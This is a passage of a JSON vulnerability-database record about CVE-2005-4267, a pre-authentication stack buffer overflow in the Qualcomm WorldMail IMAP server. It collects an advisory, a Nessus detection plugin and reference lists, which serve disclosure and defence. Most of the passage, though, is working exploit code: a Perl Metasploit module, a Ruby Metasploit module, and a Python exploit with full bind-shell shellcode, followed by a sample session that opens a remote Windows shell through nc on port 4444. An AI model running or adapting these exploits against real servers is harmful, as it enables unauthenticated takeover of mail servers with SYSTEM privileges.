= $self->GetVar('RHOST'); \nmy $target_port = $self->GetVar('RPORT'); \n \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $target_host, \n'PeerPort' => $target_port, \n'LocalPort' => $self->GetVar('CPORT'), \n'SSL' => $self->GetVar('SSL'), \n); \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$s->Send(\"A023 LOGOUT\\r\\n\"); \nmy $res = $s->Recv(-1, 20); \n$s->Close(); \n \nif ($res !~ /WorldMail 3 IMAP4 Server 6\\.1\\.22\\.0 ready/) { \n$self->PrintLine(\"[*] This server does not appear to be vulnerable.\"); \nreturn $self->CheckCode('Safe'); \n} \n \n$self->PrintLine(\"[*] Vulnerable installation detected :-)\"); \nreturn $self->CheckCode('Detected'); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $targetHost = $self->GetVar('RHOST'); \nmy $targetPort = $self->GetVar('RPORT'); \nmy $targetIndex = $self->GetVar('TARGET'); \nmy $encodedPayload = $self->GetVar('EncodedPayload'); \nmy $shellcode = $encodedPayload->Payload; \nmy $target = $self->Targets->[$targetIndex]; \n \nmy $sock = Msf::Socket::Tcp->new( \n'PeerAddr' => $targetHost, \n'PeerPort' => $targetPort, \n); \n \nif($sock->IsError) { \n$self->PrintLine('Error creating socket: ' . $sock->GetError); \nreturn; \n} \n \nmy $resp = $sock->Recv(-1, 3); \nchomp($resp); \n$self->PrintLine('[*] Got Banner: ' . $resp); \nmy $resp = $sock->Recv(-1, 3); \nif($sock->IsError) { \n$self->PrintLine('Socket error: ' . $sock->GetError); \nreturn; \n} \n \n$self->PrintLine('[*] Sending overflow...'); \n \nmy $jmpback = \n\"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\". \n\"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\". \n\"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"; \n \nmy $sploit = \n\"a001 LIST \". $self->MakeNops(20). $shellcode. \n\"\\xeb\\x06\\x46\\x92\". pack('V', $target->[1]). $self->MakeNops(8). \n$jmpback. $self->MakeNops(40). \"}\". \"\\r\\n\"; \n \n$sock->Send($sploit); \n \nmy $resp = $sock->Recv(-1, 3); \nif(length($resp)) { \n$self->PrintLine('[*] Got response, bad: ' . $resp); \n} \n \n$self->Handler($sock); \n$sock->Close(); \nreturn; \n} \n \n1; \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/43817/eudora_imap.pm.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:35", "references": [], "description": "**Name**| worldmail \n---|--- \n**CVE**| CVE-2005-4267 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| WorldMail \n**Notes**| CVE Name: CVE-2005-4267 \nVENDOR: Qualcomm \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267 \nCVSS: 7.5 \n\n", "edition": 1, "reporter": "Immunity Canvas", "published": "2005-12-21T06:03:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "canvas", "title": "Immunity Canvas: WORLDMAIL", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "modified": "2005-12-21T06:03:00", "id": "WORLDMAIL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/worldmail", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "references": [], "description": "Qualcomm WorldMail IMAP Server String Literal Processing Overflow \r\nVulnerability\r\n\r\niDefense Security Advisory 12.20.05\r\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=359\r\nDecember 20, 2005\r\n\r\nI. BACKGROUND\r\n\r\nQualcomm WorldMail is an email and messaging server designed for use\r\nin small to large enterprises that supports IMAP, POP3, SMTP, and web\r\nmail features.\r\n\r\nMore information can be found on the vendors site:\r\n\r\n http://www.eudora.com/worldmail/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Qualcomm\r\nWorldMail IMAP Server allows unauthenticated attackers to execute\r\narbitrary code.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation of this vulnerability allows attackers to\r\nexecute arbitrary code with SYSTEM privileges. This leads to a total\r\ncompromise of the mail server.\r\n\r\nIn order to trigger this overflow, an attacker only needs to send a long\r\nstring ending with a '}' character. This will result in a stack overflow\r\nand the attacker may use an SEH overwrite or a standard EBP or EIP\r\noverwrite in order to gain control of the process trivially.\r\n\r\nThis is a pre-authentication vulnerability. To exploit this\r\nvulnerability an attacker would need to be able connect to the e-mail\r\nserver and the IMAP module would have to be enabled (default). Only one\r\ncommand is required to trigger this vulnerability.\r\n\r\nIV. DETECTION\r\n\r\nThis exploit was tested against Qualcomm Worldmail server version 3.0.\r\nOther versions may be vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nThere is no workaround currently available except for disabling IMAP\r\nservices.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe vendor was contacted according to the timeline shown but a response\r\nhas not yet been received. As this vulnerability has been publicly\r\ndisclosed at an alternate location\r\n(http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html) we are\r\nproceeding with public disclosure.\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-4267 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n12/15/2005 Initial vendor notification\r\n12/20/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nposidron@tripbit.net, an anonymous researcher and Nico are credited with\r\nthe discovery of this vulnerability.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2005 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "reporter": "Securityvulns", "published": "2005-12-20T00:00:00", "title": "[Full-disclosure] iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:15", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2005-4267"], "modified": "2005-12-20T00:00:00", "id": "SECURITYVULNS:DOC:10740", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10740", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-02T00:01:28", "references": ["http://www.nessus.org/u?955a6b52", "http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html"], "pluginID": "20336", "description": "The remote host is running a version of Qualcomm WorldMail's IMAP service that is prone to a buffer overflow attack triggered when processing a long command with a closing brace. \n\nAn attacker can exploit this flaw to execute arbitrary code subject to the privileges of the affected application.", "edition": 4, "reporter": "Tenable", "published": "2005-12-20T00:00:00", "title": "Qualcomm WorldMail Multiple IMAP Command Remote Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4267"], "modified": "2018-08-07T00:00:00", "cpe": [], "id": "WORLDMAIL_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20336);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n\n script_cve_id(\"CVE-2005-4267\");\n script_bugtraq_id(15980);\n\n script_name(english:\"Qualcomm WorldMail Multiple IMAP Command Remote Overflow\");\n script_summary(english:\"Checks for buffer overflow in Qualcomm WorldMail's IMAP service\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute code on the remote IMAP server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Qualcomm WorldMail's IMAP\nservice that is prone to a buffer overflow attack triggered when\nprocessing a long command with a closing brace. \n\nAn attacker can exploit this flaw to execute arbitrary code subject to\nthe privileges of the affected application.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?955a6b52\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/12/20\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"find_service1.nasl\", \"global_settings.nasl\");\n script_exclude_keys(\"imap/false_imap\");\n script_require_ports(\"Services/imap\", 143);\n\n exit(0);\n}\n\ninclude (\"imap_func.inc\");\n\nport = get_kb_item(\"Services/imap\");\nif (!port) port = 143;\nif (!get_port_state(port) || get_kb_item(\"imap/false_imap\")) exit(0);\n\n#* OK WorldMail 3 IMAP4 Server 6.1.22.0 ready\nbanner = get_imap_banner(port:port);\nif (!banner || \"WorldMail\" >!< banner) exit(0);\n\nif (egrep (pattern:\"\\* OK WorldMail [0-3] IMAP4 Server [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+ ready\", string:banner))\n{\n version = ereg_replace (pattern:\".* OK WorldMail [0-3] IMAP4 Server ([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+) ready\", string:banner, replace:\"\\1\");\n version = split (version, sep:'.', keep:FALSE);\n\n version[0] = int(version[0]);\n version[1] = int(version[1]);\n version[2] = int(version[2]);\n version[3] = int(version[3]);\n\n if ( (version[0] < 6) ||\n ( (version[0] == 6) && (version[1] < 1) ) ||\n ( (version[0] == 6) && (version[1] == 1) && (version[2] < 22) ) ||\n ( (version[0] == 6) && (version[1] == 1) && (version[2] == 22) && (version[3] == 0) ) )\n security_hole(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2018-08-27T03:36:35", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!", "reporter": "Rapid7", "published": "2006-10-25T22:03:40", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/imap/eudora_list.rb", "type": "metasploit", "title": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4267"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/IMAP/EUDORA_LIST", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!\n },\n 'Author' => [ 'MC', 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-4267'],\n [ 'OSVDB', '22097'],\n [ 'BID', '15980'],\n\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 750,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x7b\",\n 'StackAdustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'WorldMail 3 Version 6.1.19.0', { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0\n [ 'WorldMail 3 Version 6.1.20.0', { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?\n [ 'WorldMail 3 Version 6.1.22.0', { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0\n ],\n 'DisclosureDate' => 'Dec 20 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n targ = auto_target\n disconnect\n\n return Exploit::CheckCode::Appears if (targ)\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n connect\n\n if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)\n version = $1\n ver = version.split('.')\n if (ver.length == 4)\n major = ver[0].to_i\n minor = ver[1].to_i\n rev = ver[2].to_i\n build = ver[3].to_i\n if (major == 6 and minor == 1)\n return targets[1] if (rev == 19)\n return targets[2] if (rev == 20)\n return targets[3] if (rev == 22)\n end\n end\n end\n\n # no target found\n nil\n end\n\n def exploit\n if (target_index == 0)\n mytarget = auto_target\n if mytarget\n print_status(\"Automatically detected \\\"#{mytarget.name}\\\" ...\")\n else\n fail_with(Failure::NoTarget, 'Unable to automatically detect a target')\n end\n else\n mytarget = target\n connect\n end\n\n jmp = \"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\"\n jmp << \"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\"\n jmp << \"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"\n\n sploit = \"a001 LIST \" + rand_text_alphanumeric(20)\n sploit << payload.encoded\n sploit << generate_seh_record(mytarget.ret)\n sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)\n sploit << \"}\" + \"\\r\\n\"\n\n sock.put(sploit)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/imap/eudora_list.rb"}], "exploitdb": [{"lastseen": "2016-01-31T14:07:06", "osvdbidlist": ["22097"], "references": [], "description": "Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit. CVE-2005-4267,CVE-2006-0637. Remote exploit for windows platform", "edition": 1, "reporter": "muts", "published": "2005-12-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Eudora Qualcomm WorldMail 3.0 - IMAPd Remote Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0637", "CVE-2005-4267"], "modified": "2005-12-20T00:00:00", "id": "EDB-ID:1380", "href": "https://www.exploit-db.com/exploits/1380/", "sourceData": "#!/usr/bin/python\r\n###################################################################################\r\n#\r\n# PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.\r\n#\r\n# Discovered by Tim Shelton - security-advisories@acs-inc.com\r\n#\r\n# Coded by mati@see-security.com\r\n#\r\n# Details:\r\n# * SEH gets overwritten at 970 bytes in the LIST command.\r\n# * No space for shellcode, so 1st stage shellcode is used to\r\n# jump back 768 bytes into the bindshell (2nd stage) shellcode.\r\n#\r\n# Thanks:\r\n# * My wife - for putting up with my obesssions\r\n# FOR EDUCATION PURPOSES ONLY!\r\n###################################################################################\r\n# root@muts:/tmp# ./test.py 192.168.1.162\r\n#\r\n# Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.\r\n#\r\n# Discovered by Tim Shelton - security-advisories@acs-inc.com\r\n# Coded by mati@see-security.com\r\n#\r\n# [+] Connecting\r\n# [+] * OK WorldMail IMAP4 Server 6.1.19.0 ready\r\n# [+] Look Maa - No authentication!\r\n# [+] Sending evil buffer...\r\n# [+] Done\r\n#\r\n# [+] Connect to port 4444 on victim IP - Muhahaha!\r\n#\r\n# root@muts:/tmp# nc -vn 192.168.1.162 4444\r\n# (UNKNOWN) [192.168.1.162] 4444 (krb524) open\r\n# Microsoft Windows 2000 [Version 5.00.2195]\r\n# (C) Copyright 1985-2000 Microsoft Corp.\r\n#\r\n# C:\\WINNT\\system32>\r\n#############################################################################\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nfrom time import sleep\r\n\r\ndef banner():\r\n print \"\\nEudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow.\\n\"\r\n print \"Discovered by Tim Shelton - security-advisories@acs-inc.com\"\r\n print \"Coded by mati@see-security.com\\n\"\r\n \r\nif len(sys.argv)!=3:\r\n banner()\r\n print \"Usage: eudora-imap-LIST.py <ip> <port>\\n\"\r\n sys.exit(0)\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes\r\n# First Stage Shellcode\r\nsc3 =\"\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x2f\\x77\\x28\"\r\nsc3 +=\"\\x4b\\x83\\xeb\\xfc\\xe2\\xf4\\xf6\\x99\\xf1\\x3f\\x0b\\x83\\x71\\xcb\\xee\\x7d\"\r\nsc3 +=\"\\xb8\\xb5\\xe2\\x89\\xe5\\xb5\\xe2\\x88\\xc9\\x4b\"\r\n\r\n# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */\r\n# Second Stage Shellcode\r\nsc4 =\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\nsc4 +=\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\nsc4 +=\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\nsc4 +=\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\nsc4 +=\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e\"\r\nsc4 +=\"\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x38\"\r\nsc4 +=\"\\x4e\\x36\\x46\\x32\\x46\\x52\\x4b\\x58\\x45\\x54\\x4e\\x53\\x4b\\x38\\x4e\\x37\"\r\nsc4 +=\"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x31\\x4b\\x48\"\r\nsc4 +=\"\\x4f\\x35\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x58\"\r\nsc4 +=\"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x38\\x42\\x4c\"\r\nsc4 +=\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\nsc4 +=\"\\x46\\x4f\\x4b\\x33\\x46\\x35\\x46\\x52\\x4a\\x32\\x45\\x37\\x45\\x4e\\x4b\\x48\"\r\nsc4 +=\"\\x4f\\x35\\x46\\x32\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x38\\x4e\\x50\\x4b\\x34\"\r\nsc4 +=\"\\x4b\\x38\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x32\\x4b\\x38\"\r\nsc4 +=\"\\x49\\x48\\x4e\\x36\\x46\\x32\\x4e\\x41\\x41\\x36\\x43\\x4c\\x41\\x53\\x4b\\x4d\"\r\nsc4 +=\"\\x46\\x56\\x4b\\x58\\x43\\x54\\x42\\x53\\x4b\\x48\\x42\\x34\\x4e\\x50\\x4b\\x58\"\r\nsc4 +=\"\\x42\\x37\\x4e\\x41\\x4d\\x4a\\x4b\\x58\\x42\\x44\\x4a\\x30\\x50\\x55\\x4a\\x46\"\r\nsc4 +=\"\\x50\\x38\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x48\\x56\"\r\nsc4 +=\"\\x43\\x55\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x53\\x4a\\x56\\x47\\x37\\x43\\x57\"\r\nsc4 +=\"\\x44\\x43\\x4f\\x45\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\"\r\nsc4 +=\"\\x4e\\x4f\\x4b\\x43\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x38\\x45\\x4e\"\r\nsc4 +=\"\\x48\\x36\\x41\\x38\\x4d\\x4e\\x4a\\x30\\x44\\x50\\x45\\x55\\x4c\\x36\\x44\\x30\"\r\nsc4 +=\"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55\"\r\nsc4 +=\"\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x43\\x45\\x43\\x45\\x43\\x45\\x43\\x45\\x43\\x44\"\r\nsc4 +=\"\\x43\\x45\\x43\\x44\\x43\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4a\\x56\\x41\\x31\"\r\nsc4 +=\"\\x4e\\x55\\x48\\x46\\x43\\x45\\x49\\x48\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\"\r\nsc4 +=\"\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\"\r\nsc4 +=\"\\x41\\x35\\x45\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\"\r\nsc4 +=\"\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\nsc4 +=\"\\x4a\\x36\\x45\\x4e\\x49\\x54\\x48\\x48\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\nsc4 +=\"\\x42\\x35\\x46\\x45\\x46\\x55\\x45\\x45\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x46\"\r\nsc4 +=\"\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x55\"\r\nsc4 +=\"\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\\x46\\x36\\x48\\x46\\x4a\\x36\\x43\\x56\"\r\nsc4 +=\"\\x4d\\x56\\x49\\x58\\x45\\x4e\\x4c\\x56\\x42\\x45\\x49\\x35\\x49\\x32\\x4e\\x4c\"\r\nsc4 +=\"\\x49\\x38\\x47\\x4e\\x4c\\x36\\x46\\x54\\x49\\x38\\x44\\x4e\\x41\\x33\\x42\\x4c\"\r\nsc4 +=\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x44\\x4d\\x52\\x50\\x4f\\x44\\x34\\x4e\\x32\"\r\nsc4 +=\"\\x43\\x59\\x4d\\x58\\x4c\\x57\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\"\r\nsc4 +=\"\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\\x4f\\x4f\\x45\\x57\\x46\\x44\\x4f\\x4f\"\r\nsc4 +=\"\\x48\\x4d\\x4b\\x55\\x47\\x55\\x44\\x55\\x41\\x55\\x41\\x45\\x41\\x35\\x4c\\x46\"\r\nsc4 +=\"\\x41\\x30\\x41\\x35\\x41\\x45\\x45\\x55\\x41\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x56\"\r\nsc4 +=\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x36\"\r\nsc4 +=\"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x38\\x47\\x55\\x4e\\x4f\"\r\nsc4 +=\"\\x43\\x58\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x45\\x4f\\x4f\\x42\\x4d\"\r\nsc4 +=\"\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x30\\x4f\\x35\\x43\\x35\\x4f\\x4f\\x48\\x4d\"\r\nsc4 +=\"\\x4f\\x4f\\x42\\x4d\\x5a\"\r\n\r\n# Win2k SP4 JMP EBX - 0x77E1CCF7\r\n\r\nbuffer = '\\x90'*61 + sc4+ \"\\xeb\\x06\\x06\\xeb\" + '\\xf7\\xcc\\xe1\\x77' + '\\x90'*8 + sc3 + '}'*400\r\nbanner()\r\ntry:\r\n\ts.connect((sys.argv[1],int(sys.argv[2])))\r\nexcept:\r\n\tprint \"Can\\'t connect to server!\\n\"\r\n\tsys.exit(0)\r\nprint \"[+] Connecting\"\r\ndata=s.recv(1024)\r\nprint \"[+] \"+data.rstrip()\r\nprint \"[+] Look Maa - No authentication!\"\r\nprint \"[+] Sending evil buffer...\"\r\ns.send('a001 LIST '+buffer+'\\r\\n')\r\ns.close()\r\nprint \"[+] Done\\n\"\r\nprint \"[+] Connect to port 4444 on victim IP - Muhahaha!\\n\"\r\n\r\n# milw0rm.com [2005-12-20]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1380/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.eudora.com/worldmail/\nSecurity Tracker: 1015391\nOther Advisory URL: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359\nOther Advisory URL: http://www.securiteam.com/exploits/5QP0520HPU.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0087.html\nMail List Post: http://archives.neohapsis.com/archives/vulnwatch/2005-q4/0073.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-12/1014.html\nKeyword: ACSSEC-2005-11-27 - 0x1\n[CVE-2005-4267](https://vulners.com/cve/CVE-2005-4267)\n[CVE-2006-0637](https://vulners.com/cve/CVE-2006-0637)\n", "reporter": "OSVDB", "published": "2005-12-20T03:42:38", "type": "osvdb", "title": "Eudora WorldMail Multiple IMAP Command Remote Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, 